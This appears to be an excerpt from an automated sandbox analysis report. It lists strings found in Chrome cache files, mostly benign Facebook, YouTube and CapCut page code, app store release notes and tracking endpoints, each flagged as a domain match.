_ga_6VGGZHMLM2=GS1.1.1727585632.1.1.1727585663.0.0.0; NID=518=QWo2zDOe-oL3l1IQUiPnz5DvfzV1VdA51XJbBikwkzBOeW7V2Gs458ziN2VvDfpDIeieRIza3SC60InXBzf9RZMKTDuheUM8i3rfUjpebkv4QWt48DBeGR0qaTTfdDsSuUwx5CyMZ7LToNKxOeA15GjCk06uk3CSLvr-pPQqTWy98xTkfLt0C7DEtw
    Source: chromecache_723.2.drString found in binary or memory: <a href="https://www.facebook.com/?locale=ru_RU" target="blank"> equals www.facebook.com (Facebook)
    Source: chromecache_382.2.drString found in binary or memory: "https://www.facebook.com/AppStore/" equals www.facebook.com (Facebook)
    Source: chromecache_786.2.dr, chromecache_857.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/ equals www.facebook.com (Facebook)
    Source: chromecache_933.2.dr, chromecache_554.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/A4tfXiHOGrs/ equals www.facebook.com (Facebook)
    Source: chromecache_900.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/CCT5pM3qiNk/ equals www.facebook.com (Facebook)
    Source: chromecache_933.2.dr, chromecache_554.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/Ga6vBwdwgUx/ equals www.facebook.com (Facebook)
    Source: chromecache_900.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/MDzNl_j9yvg/ equals www.facebook.com (Facebook)
    Source: chromecache_732.2.dr, chromecache_544.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/OKBVmODmb-W/ equals www.facebook.com (Facebook)
    Source: chromecache_754.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/V9vdYColc4k/ equals www.facebook.com (Facebook)
    Source: chromecache_498.2.dr, chromecache_868.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/WRsJ32R7YJG/ equals www.facebook.com (Facebook)
    Source: chromecache_811.2.dr, chromecache_957.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/YzYYrH_bE_k/ equals www.facebook.com (Facebook)
    Source: chromecache_900.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/aJoeSHn7XcN/ equals www.facebook.com (Facebook)
    Source: chromecache_546.2.dr, chromecache_754.2.drString found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
    Source: chromecache_452.2.drString found in binary or memory: </span><a href="https://www.facebook.com/" data-gt="&#123;&quot;target&quot;:&quot;home&quot;,&quot;marketing_page_click&quot;:&quot;1&quot;,&quot;conversion&quot;:&quot;1&quot;&#125;">Go to Feed</a><span role="presentation" aria-hidden="true"> equals www.facebook.com (Facebook)
    Source: chromecache_452.2.drString found in binary or memory: <i class="_3jii img sp_PEqIp1jvkJq sx_17d8b9" id="u_0_1_bj"></i></span></a><div class="_yl7 _ylb __tw hidden_elem" id="u_0_2_1v"><div class="beeperNub"></div><div class="_yl8"><div class=""><form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=110" method="post" novalidate="1" onsubmit=""><input type="hidden" name="jazoest" value="2943" autocomplete="off" /><input type="hidden" name="lsd" value="AVrc04HtauM" autocomplete="off" /><div class="_erp"><div class="_err"><label for="email">Email or phone</label></div><div class="_err"><input type="email" class="inputtext login_form_input_box" name="email" id="email" data-testid="royal_email" /></div><div class="_ers"><label for="pass">Password</label></div><div class="_ers"><input type="password" class="inputtext login_form_input_box" name="pass" id="pass" data-testid="royal_pass" /></div><div class="_er_"><a href="https://www.facebook.com/recover/initiate?lwv=110&amp;ars=royal_blue_bar">Forgotten account?</a></div><button value="1" class="_42ft _4jy0 _es1 _3jd8 login_form_login_button _4jy5 _4jy1 selected _51sy" id="loginbutton" data-testid="royal_login_button" type="submit">Log in</button></div><input type="hidden" autocomplete="off" name="timezone" value="" id="u_0_3_Fq" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_WO" /><input type="hidden" name="lgnrnd" value="215447_HZPY" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_GB" /><input type="hidden" autocomplete="off" name="login_source" value="login_bluebar" /><input type="hidden" autocomplete="off" name="guid" value="" /><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /></form></div><div class="_yl9">Do you want to join Facebook?</div><a role="button" class="_42ft _4jy0 _yla _4jy3 _4jy2 selected _51sy mrm" href="/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzI3NTg1Njg2LCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D" tabindex="4">Sign Up</a></div></div></div></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_GB">Sign Up</a></span></div></div></div></div></div></div><div id="globalContainer" class="_cqt"><div class="fb_content clearfix " id="content" role="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn&#039;t available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_PEqIp1jvkJq sx_82a77e"></i><div class="mbl pvl _4
    Source: chromecache_382.2.drString found in binary or memory: Get access to YouTube Music Premium as part of your benefits\\n\\nNote: If you subscribe via Apple, payment will be charged to App Store Account at confirmation of purchase. Subscription automatically renews unless auto-renew is turned off at least 24 hours before the end of the current period. Account will be charged for renewal within 24 hours prior to the end of the current period at the rate of the selected plan. Subscriptions and auto-renewal may be managed by going to Account Settings after purchase.\\n\\nYouTube paid service terms: https://www.youtube.com/t/terms_paidservice.\\nPrivacy policy: https://www.google.com/policies/privacy\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.youtube.com\",\"versionHistory\":[{\"versionDisplay\":\"19.38.2\",\"releaseNotes\":\"Fixed bugs, improved performance, drank way too much coffee.\",\"releaseDate\":\"2024-09-25\",\"releaseTimestamp\":\"2024-09-25T14:07:13Z\"},{\"versionDisplay\":\"19.37.2\",\"releaseNotes\":\"Fixed bugs, improved performance, took the afternoon off.\",\"releaseDate\":\"2024-09-16\",\"releaseTimestamp\":\"2024-09-16T11:51:19Z\"},{\"versionDisplay\":\"19.36.1\",\"releaseNotes\":\"Bug fixes, stability improvements, repairs to space-time continuum.\",\"releaseDate\":\"2024-09-08\",\"releaseTimestamp\":\"2024-09-08T23:00:37Z\"},{\"versionDisplay\":\"19.35.3\",\"releaseNotes\":\"We fixed the tubes that bring you videos equals www.youtube.com (Youtube)
    Source: chromecache_382.2.drString found in binary or memory: Leap into the fediverse\\nThreads is part of the fediverse, a global, open, social network of independent servers operated by third parties around the world. Servers share information with each other to enable people to connect and discover new things across the fediverse.\\n\\n\\nMeta Terms: https://www.facebook.com/terms.php\\nMeta Privacy Policy: https://privacycenter.instagram.com/policy\\nThreads Supplemental Privacy Policy: https://help.instagram.com/515230437301944\\nThreads Supplemental Terms: https://help.instagram.com/769983657850450\\nInstagram Community Guidelines: https://help.instagram.com/477434105621119\\nConsumer Health Privacy Policy: https://privacycenter.instagram.com/policies/health\\n\\nLearn how we're working to help keep our communities safe across Meta technologies at the Meta Safety Center: https://about.meta.com/actions/safety\\n\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"versionHistory\":[{\"versionDisplay\":\"350.0\",\"releaseNotes\":\"We equals www.facebook.com (Facebook)
    Source: chromecache_452.2.drString found in binary or memory: </a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fja-jp.facebook.com%2Fajax%2Fwebstorage%2Fprocess_keys%2F%3Fstate%3D1&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_SOkuOHNUdYM sx_2458cb"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log in to Facebook">Log in</a></li><li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse in Video">Video</a></li><li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://about.meta.com/technologies/meta-pay" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.meta.com/" title="Discover Meta" target="_blank">Meta Store</a></li><li><a href="https://www.meta.com/quest/" title="Learn more about Meta Quest" target="_blank">Meta Quest</a></li><li><a href="https://www.meta.com/smart-glasses/" title="Learn more about Ray-Ban Meta" target="_blank">Ray-Ban Meta</a></li><li><a href="https://www.meta.ai/" title="Meta AI">Meta AI</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1BAE4BfDRrYyOEiD-SwIev2UPtHYkIlnVTW9WIlt5n-XB7i4ncdiuarsWvyE_2qPlfQQ7q_EWoezbGntC1iqxfBjZ_UwF7jvldrs8-kQT7LIKhkCNBl6jngmteM13JK_QWMzxoKb3ZbSdhPi7S9A" title="Take a look at Instagram" target="_blank" rel="noreferrer nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.threads.net/" title="Check out Threads">Threads</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Centre">Voting Information Centre</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Centre</a></li><li><a href="/groups/discover/" title="Explore our groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placeme
    Source: chromecache_452.2.drString found in binary or memory: <script type="text/javascript" nonce="NqiSP8X6">requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["cr:7736",["FBLynxLogging"],{"__rc":["FBLynxLogging",null]},-1],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT2SmpteGUB_Kgt_edKaLGe-tS66Tp1k3zPKhFoM4kpwZq9l2ibyobLcjt7ejRihiIQxx2PccMabihutxi6H3jq3FERwv9gOuedzzIKjJEY0LCwvRnDTSEUzKLCNfuZ7hI6RRx1nRRZfKoPBnRVAVA","untrusted_link_default_hash":"AT1-ijBLEYGiMqY8gtkeh1MkeWRUa7Dg3MgijUz7l61T-drdqZX9ilzecuYD07_yU2znzfTPexyhMcS_bFdRtutQQU9HWSR69wYIFzxQttqKXTiFPtaExkiZ3nxsYt7PKoz6_CTCYVcncG1GfZh0zg","linkshim_host":"l.facebook.com","linkshim_path":"\/l.php","linkshim_enc_param":"h","linkshim_url_param":"u","use_rel_no_opener":true,"use_rel_no_referrer":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy","ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"elements":[["__elem_072b8e64_0_0_iD","u_0_0_Dr",1],["__elem_94c15385_0_0_LI","u_0_1_bj",1],["__elem_a588f507_0_3_6B","u_0_2_1v",1],["__elem_835c633a_0_0_ey","login_form",1],["__elem_efa9dffa_0_0_Ib","email",1],["__elem_45d73b5d_0_0_Ho","loginbutton",1],["__elem_f46f4946_0_0_3G","u_0_3_Fq",1],["__elem_f46f4946_0_1_gH","u_0_4_WO",1],["__elem_a588f507_0_1_us","u_0_5_Rw",1],["__elem_9f5fac15_0_0_U2","pagelet_bluebar",1],["__elem_a588f507_0_0_J5","globalContainer",1],["__elem_a588f507_0_2_ZS","content",1]],"require":[["WebPixelRatioDetector","startDetecting",[],[false]],["ScriptPath","set",[],["X4oh4Controller","a1f3c513",{"imp_id":"0DAg8h0ch1AE4nKcJ","ef_page":null,"uri":"https:\/\/www.facebook.com\/ajax\/webstorage\/process_keys\/?state=1"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_J5"],[{"__m":"__elem_a588f507_0_0_J5"}]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["AsyncRequestNectarLogging"],["FourOhFourJSLogger","log",[],[]],["IntlUtils"],["FBLynx","setupDelegation",[],[]],["LoginbarPopover","init",["__elem_94c15385_0_0_LI","__elem_072b8e64_0_0_iD","__elem_a588f507_0_3_6B"],[{"__m":"__elem_94c15385_0_0_LI"},{"__m":"__elem_072b8e64_0_0_iD"},{"__m":"__elem_a588f507_0_3_6B"}]],["TimezoneAutoset","setInputValue",["__elem_f46f4946_0_0_3G"],[{"__m":"__elem_f46f4946_0_0_3G"},1727585686]],["ScreenDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_gH"],[{"__m":"__elem_f46f4946_0_1_gH"}]],["LoginFormContr
    Source: chromecache_771.2.drString found in binary or memory: L.getElementsByTagName("iframe"),la=S.length,na=0;na<la;na++)if(!u&&c(S[na],H.Ge)){hJ("https://www.youtube.com/iframe_api");u=!0;break}})}}else F(v.vtp_gtmOnSuccess)}var q=["www.youtube.com","www.youtube-nocookie.com"],r={UNSTARTED:-1,ENDED:0,PLAYING:1,PAUSED:2,BUFFERING:3,CUED:5},t,u=!1;Z.__ytl=n;Z.__ytl.o="ytl";Z.__ytl.isVendorTemplate=!0;Z.__ytl.priorityOverride=0;Z.__ytl.isInfrastructure=!1; equals www.youtube.com (Youtube)
    Source: chromecache_354.2.dr, chromecache_771.2.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},Yj:function(){e=zb()},nd:function(){d()}}};var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
    Source: chromecache_382.2.drString found in binary or memory: \\nhttps://www.capcut.net/clause/privacy?region=us\\n\\nContact Us\\nAny questions about CapCut? Please contact us at capcut.support@bytedance.com.\\nFacebook: https://www.facebook.com/capcutapp/\\nInstagram: https://www.instagram.com/capcutapp/\\nYouTube: https://www.youtube.com/c/capcutofficial\\nTikTok: https://www.tiktok.com/@capcut\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.capcut.com\",\"versionHistory\":[{\"versionDisplay\":\"4.6.0\",\"releaseNotes\":\"- Added custom tracking for any area to camera tracking.\\n- Added new scenes to auto removal for improved portrait removal.\\n- Short text recommendations are now supported in AI writer for smart generation of narrations, editing, expanding, and summarizing.\\n- Layout presets and custom layouts are now supported in the editor window for improved editing efficiency.\\n- AI image inpaint is now supported with smart erase or content replacement.\",\"releaseDate\":\"2024-09-28\",\"releaseTimestamp\":\"2024-09-28T12:53:54Z\"},{\"versionDisplay\":\"4.1.0\",\"releaseNotes\":\"- Several preinstalled, realistic, AI-generated people with natural backgrounds have been added.\\n- Smart Split in the editor now supports deleting and moving split points.\\n- Clean up edge and Feather edge added to Chroma keying.\\n- Fixed some known issues - improved the editing experience.\\nThank you for choosing CapCut and creating even more beautiful moments with us.\",\"releaseDate\":\"2024-07-27\",\"releaseTimestamp\":\"2024-07-27T10:43:41Z\"},{\"versionDisplay\":\"3.8.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-24\",\"releaseTimestamp\":\"2024-04-24T06:53:47Z\"},{\"versionDisplay\":\"3.7.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-07\",\"releaseTimestamp\":\"2024-04-07T03:04:40Z\"},{\"versionDisplay\":\"3.6.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-22\",\"releaseTimestamp\":\"2024-03-22T04:00:14Z\"},{\"versionDisplay\":\"3.5.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-04\",\"releaseTimestamp\":\"2024-03-04T03:32:27Z\"},{\"versionDisplay\":\"3.4.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-02-02\",\"releaseTimestamp\":\"2024-02-02T02:14:57Z\"},{\"versionDisplay\":\"3.3.0\",\"releaseNotes\":\"We
    Source: chromecache_382.2.drString found in binary or memory: \\nhttps://www.capcut.net/clause/privacy?region=us\\n\\nContact Us\\nAny questions about CapCut? Please contact us at capcut.support@bytedance.com.\\nFacebook: https://www.facebook.com/capcutapp/\\nInstagram: https://www.instagram.com/capcutapp/\\nYouTube: https://www.youtube.com/c/capcutofficial\\nTikTok: https://www.tiktok.com/@capcut\"},\"isStandaloneWithCompanionForWatchOS\":false,\"isAppleWatchSupported\":false,\"requiredCapabilitiesForRealityDevice\":\"arm64 \",\"websiteUrl\":\"https://www.capcut.com\",\"versionHistory\":[{\"versionDisplay\":\"4.6.0\",\"releaseNotes\":\"- Added custom tracking for any area to camera tracking.\\n- Added new scenes to auto removal for improved portrait removal.\\n- Short text recommendations are now supported in AI writer for smart generation of narrations, editing, expanding, and summarizing.\\n- Layout presets and custom layouts are now supported in the editor window for improved editing efficiency.\\n- AI image inpaint is now supported with smart erase or content replacement.\",\"releaseDate\":\"2024-09-28\",\"releaseTimestamp\":\"2024-09-28T12:53:54Z\"},{\"versionDisplay\":\"4.1.0\",\"releaseNotes\":\"- Several preinstalled, realistic, AI-generated people with natural backgrounds have been added.\\n- Smart Split in the editor now supports deleting and moving split points.\\n- Clean up edge and Feather edge added to Chroma keying.\\n- Fixed some known issues - improved the editing experience.\\nThank you for choosing CapCut and creating even more beautiful moments with us.\",\"releaseDate\":\"2024-07-27\",\"releaseTimestamp\":\"2024-07-27T10:43:41Z\"},{\"versionDisplay\":\"3.8.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-24\",\"releaseTimestamp\":\"2024-04-24T06:53:47Z\"},{\"versionDisplay\":\"3.7.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-04-07\",\"releaseTimestamp\":\"2024-04-07T03:04:40Z\"},{\"versionDisplay\":\"3.6.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-22\",\"releaseTimestamp\":\"2024-03-22T04:00:14Z\"},{\"versionDisplay\":\"3.5.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-03-04\",\"releaseTimestamp\":\"2024-03-04T03:32:27Z\"},{\"versionDisplay\":\"3.4.0\",\"releaseNotes\":\"We've introduced and upgraded some features to help you make even more amazing videos\\n1. Performance and user experience optimizations\",\"releaseDate\":\"2024-02-02\",\"releaseTimestamp\":\"2024-02-02T02:14:57Z\"},{\"versionDisplay\":\"3.3.0\",\"releaseNotes\":\"We
    Source: chromecache_347.2.drString found in binary or memory: __d("AdsCanvasConstants",["AdsStrings","SearchableEntry"],(function(a,b,c,d,e,f,g){"use strict";a={CATALOG_MANAGER:"catalog_manager"};b=1e3;e=100;f="1128914607238107";var h="https://www.facebook.com/business/learn/facebook-create-ad-canvas-ads/",i="https://fb.com/canvas_doc/",j=1,k=1,l="https://fb.com/canvas_doc/",m="1454940661230823",n=20,o=["facebook/right_column","facebook/instant_article","facebook/instream_video","facebook/video_feeds"],p=["audience_network","messenger"],q="creative_section",r="canvas_section",s="page_section",t="existing_section";c=new(c("SearchableEntry"))({subtile:"",title:d("AdsStrings").MixedValuePlaceholder,uniqueID:0});d="_COPY";var u=["397246414010297","949746971832205","1867119523503927","625628120978122","1825832234305849","144440257763467"],v="Manually Added Products",w="133471657203838",x="1932289657009030",y="1063217037112304",z="424787857903852",A="1369752616394017",B="3946326578782885",C={133471657203838:"/images/ads/canvas/carousel_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/carousel_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/carousel_sell_product_manual_template_preview.gif",1309632222469576:"/images/ads/canvas/carousel_collect_contact_info.gif"},D={133471657203838:"/images/ads/canvas/collection_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/collection_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/collection_sell_product_manual_template_preview.gif",1932289657009030:"/images/ads/canvas/collection_sell_product_grid_template_preview.gif",1369752616394017:"/images/ads/canvas/collection_sell_product_lifestyle_template_preview.gif",3946326578782885:"/images/ads/canvas/collection_digital_circular_template_preview.gif"},E={133471657203838:"/images/ads/canvas/image_get_new_customers_template_preview.gif",1063217037112304:"/images/ads/canvas/image_showcase_your_business_template_preview.gif",424787857903852:"/images/ads/canvas/image_sell_product_manual_template_preview.gif",1309632222469576:"/images/ads/canvas/image_collect_contact_info.gif"};g.APP_REFERRER=a;g.ADS_CANVAS_LIBRARY_DOC_MAX=b;g.ADS_CANVAS_LIBRARY_PRELOAD_ITEMS_COUNT=e;g.ADS_COLLECTION_HELP_DOC_CMS_ID=f;g.CANVAS_LEARN_MORE_LINK=h;g.CANVAS_PREFIX=i;g.DEFAULT_PAGE_CANVAS_COUNT=j;g.DEFAULT_PAGE_PUBLISHED_CANVAS_COUNT=k;g.EMPTY_CANVAS_LINK=l;g.INLINE_TEMPLATE_HELPTRAY_CMS_ID=m;g.TYPE_AHEAD_LIMIT=n;g.UNSUPPORTED_PLACEMENT_GROUPS=o;g.UNSUPPORTED_PLACEMENT_PLATFORMS=p;g.CREATIVE_SECTION=q;g.CANVAS_SECTION=r;g.PAGE_SECTION=s;g.EXISTING_SECTION=t;g.MIXED_SEARCH_ENTRY=c;g.CANVAS_COPY_SUFFIX=d;g.INLINE_SOURCE_DOC_ID=u;g.MANUAL_CATALOG_NAME=v;g.GET_NEW_CUSTOMERS_TEMPLATE_ID=w;g.SELL_PRODUCTS_GRID_LAYOUT_TEMPLATE_ID=x;g.STORYTELLING_TEMPLATE_ID=y;g.SELL_PRODUCTS_MANUAL_TEMPLATE_ID=z;g.SELL_PRODUCTS_LIFESTYLE_TEMPLATE_ID=A;g.DIGITAL_CIRCULARS_TEMPLATE_ID=B;g.TEMPLATE_CAROUSEL_THUMBNAIL_GIF=C;g.TEMPLATE_COLLECTION_THUMBNAIL_GIF=D;g.TEM
    Source: chromecache_605.2.dr, chromecache_782.2.drString found in binary or memory: __d("AdsCertificationConstants",[],(function(a,b,c,d,e,f){"use strict";a="https://www.aclu.org";b="https://www.consumerfinance.gov/";c="https://civilrights.org";d="https://www.eeoc.gov";e="https://www.facebook.com/policies/ads/prohibited_content/discriminatory_practices";var g="https://www.hud.gov",h="https://www.justice.gov/crt",i="https://nationalfairhousing.org/";f.ACLU_LINK=a;f.CFPU_LINK=b;f.CIVIL_RIGHT_LINK=c;f.EEOC_LINK=d;f.FACEBOOK_POLICY_LINK=e;f.HUD_LINK=g;f.JUSTIC_LINK=h;f.NFHA_LINK=i}),66); equals www.facebook.com (Facebook)
    Source: chromecache_416.2.drString found in binary or memory: __d("Chromedome",["fbt"],(function(a,b,c,d,e,f,g,h){function i(){if(document.domain==null)return null;var a=document.domain,b=/^intern\./.test(a);if(b)return null;b=/(^|\.)facebook\.(com|sg)$/.test(a);if(b)return"facebook";b=/(^|\.)instagram\.com$/.test(a);if(b)return"instagram";b=/(^|\.)threads\.net$/.test(a);if(b)return"threads";b=/(^|\.)messenger\.com$/.test(a);return b?"messenger":null}function j(a){if(a==="instagram")return h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable an Instagram feature or \"hack\" someone's account, it is a scam and will give them access to your Instagram account.");return a==="threads"?h._("This is a browser feature intended for developers. If someone told you to copy-paste something here to enable a Threads feature or \"hack\" someone's account, it is a scam and will give them access to your Threads account."):h._("This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or \"hack\" someone's account, it is a scam and will give them access to your Facebook account.")}function a(a){if(top!==window)return;a=i();if(a==null)return;var b=h._("Stop!");a=j(a);var c=h._("See {url} for more information.",[h._param("url","https://www.facebook.com/selfxss")]),d="font-family:helvetica; font-size:20px; ";[[b,d+"font-size:50px; font-weight:bold; color:red; -webkit-text-stroke:1px black;"],[a,d],[c,d],["",""]].map(function(a){window.setTimeout(console.log.bind(console,"\n%c"+a[0].toString(),a[1]))})}g.start=a}),226); equals www.facebook.com (Facebook)
    Source: chromecache_957.2.drString found in binary or memory: __d("StaticLinks.brands",[],(function(a,b,c,d,e,f){a=Object.freeze({FB_TERMS:"https://www.facebook.com/terms.php",ONLINE_INVOICING_TERMS:"https://www.facebook.com/terms_ads_invoicing.php",ONLINE_EC_GRAPH_API_TERMS:"https://www.facebook.com/ec_graph_api_terms.php",PAGES_TERMS:"https://www.facebook.com/page_guidelines.php",COMMUNITY_PAYMENT_TERMS:"https://www.facebook.com/payments_terms",IG_TERMS:"https://help.instagram.com/581066165581870",IG_DATA_POLICY:"https://help.instagram.com/519522125107875",IG_COOKIE_TERMS:"https://www.instagram.com/legal/cookies/",IG_PAGE_TERMS:"https://www.facebook.com/policies/pages_groups_events/",SELF_SERVE_ADS_TERMS:"https://www.facebook.com/legal/self_service_ads_terms",PRIVACY_POLICY:"https://facebook.com/privacy/policy"});f["default"]=a}),66); equals www.facebook.com (Facebook)
    Source: chromecache_753.2.drString found in binary or memory: return b}DC.H="internal.enableAutoEventOnTimer";var gc=ja(["data-gtm-yt-inspected-"]),FC=["www.youtube.com","www.youtube-nocookie.com"],GC,HC=!1; equals www.youtube.com (Youtube)
    Source: chromecache_913.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_913.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
    Source: chromecache_913.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
